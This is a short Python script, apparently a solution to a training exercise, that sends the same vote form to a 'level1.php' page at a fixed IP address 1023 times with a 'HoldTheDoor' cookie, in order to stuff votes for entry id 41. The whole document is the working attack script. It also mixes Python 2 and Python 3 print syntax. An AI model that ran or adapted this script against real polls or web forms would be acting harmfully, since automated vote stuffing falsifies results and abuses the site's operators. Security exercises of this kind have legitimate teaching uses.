#!/usr/bin/python

import requests

header_data = {
    'Cookie': 'HoldTheDoor='
}

form_data = {
    'id': '41',
    'type': 'text',
    'holdthedoor': 'submit',
    'key': ''
}

for i in range(1023):
    r = requests.post("http://173.246.108.142/level1.php", data=form_data, headers=header_data)
    print (r.status_code, r.reason)

print "done!"
